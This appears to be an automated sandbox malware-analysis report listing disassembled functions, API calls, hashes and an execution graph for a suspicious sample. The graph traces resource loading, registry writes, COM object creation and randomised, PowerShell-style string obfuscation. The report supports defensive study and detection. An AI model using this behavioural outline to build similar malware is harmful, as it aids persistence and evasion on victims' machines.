                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: 03e2f8987b7b3cbe52326c4479113de5a24e170e098d0b603ea798d99535c99a
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: 37015E36600AA0C6D764DF6BE98814ABBA0F78CF80F084425EF5A43B19DF38D091CB40
                                                                  Function 000002408A2A2DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002408A2A2D9B), ref: 000002408A2A2ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002408A2A2D9B), ref: 000002408A2A2F57
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: be321a534fd534bc05a886d8d5d864aed2f9582f8c95a6bb206268135cf946ec
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: 4391BE7270066089F7709F6E96C87AD6BA4F354B88F544109DF0AA7EA5DB34E8C2CF00
                                                                  Function 000002408A292604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: 1279204164977c886c66c13ab335537950eda136c4da342761a90b7ff87db7fc
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: BB716F3630068146EB75DA2F9A887EBBB94B785F84F480016DE0A57F99DE34C5848B40
                                                                  Function 000002408994A24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: cc2454ad6ea742706e5d6021bc5e9c7e58a20a4b05696d38448617acd58f2851
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: A1618C33A05B84CAEB21EF69D58839D77A0F348B9CF144215EF8917B99DB38D496C708
                                                                  Function 000002408A2923F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: ececdefe1ac0b5236df46aa0fea75aee35ab016135187b54f502e1ef08d528dd
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 2A51AF3630478182F7789A2FA6E87ABAB91F785B80F480025DF5913F99DA39C484CF40
                                                                  Function 0000024089952DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: e3632cf0faa2884abe8bef25ae3ee24f3f2ff5deabc5a44064bd619f37204a38
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: EC617751D25F488DD563AF3D95EE33767187FA63C5F42D307EA8A71A61DB3894838200
                                                                  Function 000002408A2A2B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: 452eb158713b319a55f3bd794e444267236df8f4f9927895fcbc57923c6a53ab
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: C141E433314A5082DB30CF2AE5887AA77A1F398794F814021EF4D87B94DB7CD481CB40
                                                                  Function 000002408A2998D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: 6eabd3e355e5b67f48db9442ae7b3dc10682e2ed0e11ffff51a4f034c56f9e24
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: A911FE32215B8482EB618F1AE64435A7BE5F788F94F584225DF9D07B68DF3DC5918B00
                                                                  Function 0000024089947786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: e2c22169e998d8ebacdb75025f40579bb88f2a2d899cdad298ac28063eea38fe
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 98E08661A41B44D0DF029F26E5D82D833A0DB58B54F899122DA9C06315FA3CD1E9C301
                                                                  Function 00000240899477E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: a6216ee66644fc5ab5c7b77e7fa4c42cdb7eeced81df860a1891822be9313c50
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: D9E08661A41B44C0DF029F25D5D41983360E758B54F899122DA9C06315EA3CD1E5C300
                                                                  Function 00000240899478EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000003.1816754246.0000024089940000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000024089940000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_3_24089940000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: 100149682c65cb0ab3353a091d46fbbfb1404d811749275f367980b11ed6bdd1
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 37D06722A21A84A5EE11FB08D9DD38A6374F394309F954411928D41975DF39CA8AC741
                                                                  Function 000002408A291C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: edcad32d81738ade1f73171f2d87282f723bab7b196b67cd984df772c48bc63b
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: 17116D35B01B9081EA64CB6BA54C21A6BA1F789FD0F5D4128DF4D93B25DF38D482C700
                                                                  Function 000002408A291268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 5d9185cc83e4cce889635d7ef653d7873b9f71e7106c0078a62238e334c61d6e
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: 40E06531B01A2086E7288FA7D84C349BBE1FB88F0AF08C024CA0907761DF7D94D98B80
                                                                  Function 000002408A291000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000001F.00000002.1988041930.000002408A291000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002408A290000, based on PE: true
                                                                  • Associated: 0000001F.00000002.1988012898.000002408A290000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988102709.000002408A2A6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988272423.000002408A2B1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988406986.000002408A2B3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000001F.00000002.1988445155.000002408A2B9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_31_2_2408a290000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: e984cb40b47b579263da4e65cd5ebbc8b440a42ac7779754c188b35efbbd470c
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: 1CE0E571711A6086E7289B67D94C259BBA1FB88B16F488024CA1907B21EF38A4D98A10

                                                                  Executed Functions

                                                                  Function 00007FF703781140 Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000026.00000002.1757680887.00007FF703781000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF703780000, based on PE: true
                                                                  • Associated: 00000026.00000002.1757659925.00007FF703780000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000026.00000002.1757711193.00007FF70378C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000026.00000002.1757738267.00007FF70378F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000026.00000002.1758159836.00007FF703A08000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000026.00000002.1758492789.00007FF703C7F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000026.00000002.1758576281.00007FF703CB8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_38_2_7ff703780000_weiuemyrzjra.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                  • Instruction ID: 969fed1e4abdcc93504c53b4d2f275ba38e423981d955325edb4edaf05f1ad95
                                                                  • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                                  • Instruction Fuzzy Hash: 6EB09230D4420A84E2423B01AC81258A2606F0CB80FD02020C40C22352CB6D50414B30

                                                                  Execution Graph

                                                                  Execution Coverage:76.7%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:96
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 190 140001970 193 140001984 FindResourceExA 190->193 194 140001979 ExitProcess 193->194 195 1400019ae SizeofResource 193->195 195->194 196 1400019c3 LoadResource 195->196 196->194 197 1400019d7 LockResource RegOpenKeyExW 196->197 197->194 198 140001a0e RegSetValueExW 197->198 198->194 199 140001a34 198->199 209 140001a7c GetProcessHeap HeapAlloc StrCpyW 199->209 203 140001a48 204 1400017ec 9 API calls 203->204 205 140001a57 204->205 252 14000117c 7 API calls 205->252 207 140001a62 207->194 262 140001614 SysAllocString SysAllocString CoInitializeEx 207->262 272 14000114c GetModuleHandleA 209->272 212 140001b05 StrCatW StrCatW 275 140001c9c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 212->275 213 140001ad5 StrCatW StrCatW StrCatW 213->212 218 140001c0c 6 API calls 219 140001b4b 218->219 220 140001c0c 6 API calls 219->220 221 140001b5a 220->221 222 140001c0c 6 API calls 221->222 223 140001b69 222->223 224 140001c0c 6 API calls 223->224 225 140001b78 224->225 226 140001c0c 6 API calls 225->226 227 140001b87 226->227 228 140001c0c 6 API calls 227->228 229 140001b96 228->229 230 140001c0c 6 API calls 229->230 231 140001ba5 230->231 232 140001c0c 6 API calls 231->232 233 140001bb4 232->233 234 140001c0c 6 API calls 233->234 235 140001bc3 234->235 236 140001c0c 6 API calls 235->236 237 140001bd2 236->237 238 140001c0c 6 API calls 237->238 239 140001be1 238->239 240 140001c0c 6 API calls 239->240 241 140001bf0 240->241 242 140001c0c 6 API calls 241->242 243 140001a39 242->243 244 1400017ec SysAllocString SysAllocString CoInitializeEx 243->244 245 140001948 SysFreeString SysFreeString 244->245 246 14000182d CoInitializeSecurity 244->246 245->203 247 140001875 CoCreateInstance 246->247 248 140001869 246->248 249 140001942 CoUninitialize 247->249 250 1400018a4 VariantInit 247->250 248->247 248->249 249->245 251 1400018fa 250->251 251->249 253 14000120e CoInitializeSecurity 252->253 254 1400015c0 6 API calls 252->254 255 140001256 CoCreateInstance 253->255 256 14000124a 253->256 254->207 257 1400015ba CoUninitialize 255->257 258 140001287 VariantInit 255->258 256->255 256->257 257->254 260 1400012de 258->260 259 140001537 259->257 260->259 261 140001489 VariantInit VariantInit VariantInit 260->261 261->259 263 1400017c5 SysFreeString SysFreeString 262->263 264 140001655 CoInitializeSecurity 262->264 263->194 265 140001691 264->265 266 14000169d CoCreateInstance 264->266 265->266 267 1400017bf CoUninitialize 265->267 266->267 268 1400016cc VariantInit 266->268 267->263 269 140001722 268->269 270 14000175c VariantInit 269->270 271 14000178e 269->271 270->271 271->267 273 140001174 272->273 274 140001167 GetProcAddress 272->274 273->212 273->213 274->273 296 140001000 CryptAcquireContextW 275->296 278 140001b2d 289 140001c0c lstrlenW 278->289 279 140001d0d StrStrIW 280 140001f21 6 API calls 279->280 284 140001d2c 279->284 280->278 281 140001d2f StrStrIW StrNCatW StrCatW 282 140001edf StrCatW StrStrIW 281->282 281->284 282->281 283 140001f19 282->283 283->280 284->281 284->282 285 140001ebf StrCatW 284->285 286 140001e82 StrCatW StrNCatW 284->286 288 140001e5a StrCatW StrCatW 284->288 285->284 287 140001eae StrCatW 286->287 287->285 288->287 299 140001070 289->299 291 140001c45 292 140001c49 StrStrIW 291->292 293 140001b3c 291->293 292->293 294 140001c5a 292->294 293->218 295 140001c5d StrStrIW 294->295 295->293 295->295 297 140001039 CryptGenRandom CryptReleaseContext 296->297 298 14000105e 296->298 297->298 298->278 298->279 300 140001000 3 API calls 299->300 301 1400010ea 300->301 301->291 301->301

                                                                  Callgraph

                                                                  Executed Functions

                                                                  Function 0000000140001000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32encryptionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                  • API String ID: 1815803762-291530887
                                                                  • Opcode ID: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                                  • Instruction ID: 74dd50a8ca20c1687fe1fd25669d783deb6ceb092ba3a030a89a64c3b25fe62d
                                                                  • Opcode Fuzzy Hash: 0ddbc8895b0669cb0ada80a9b3cf58f5140d61cb55c0be0e277e251b20bcd660
                                                                  • Instruction Fuzzy Hash: 28F01976700B4082E711CB67E88438AA7A2BBCCB80F498025DB5947729DEB4C956C740
                                                                  Function 0000000140001C9C Relevance: 49.2, APIs: 22, Strings: 6, Instructions: 196memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                                  • String ID: '+'$'+[Char]($)+'$0$gfff$gfff
                                                                  • API String ID: 3510167801-2888743547
                                                                  • Opcode ID: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                                  • Instruction ID: 860a95141ccdf47dad873dcb7fdad07428551a8c4d737b9ab5c8568f3082a9eb
                                                                  • Opcode Fuzzy Hash: 4c029fa0796edbe0ffa46a87d68ca35ae0ec6b91dd14a689a3b9c7fb106a92b8
                                                                  • Instruction Fuzzy Hash: 6A715CB2710B5696EB16DF67FC187D927A6FB89BC8F448025EE0A47B65DE38C509C300
                                                                  Function 0000000140001A7C Relevance: 45.6, APIs: 8, Strings: 18, Instructions: 85memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000003E.00000002.1758687521.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 0000003E.00000002.1758660989.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140002000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000003E.00000002.1758719064.0000000140005000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AddressAllocHandleModuleProcProcess
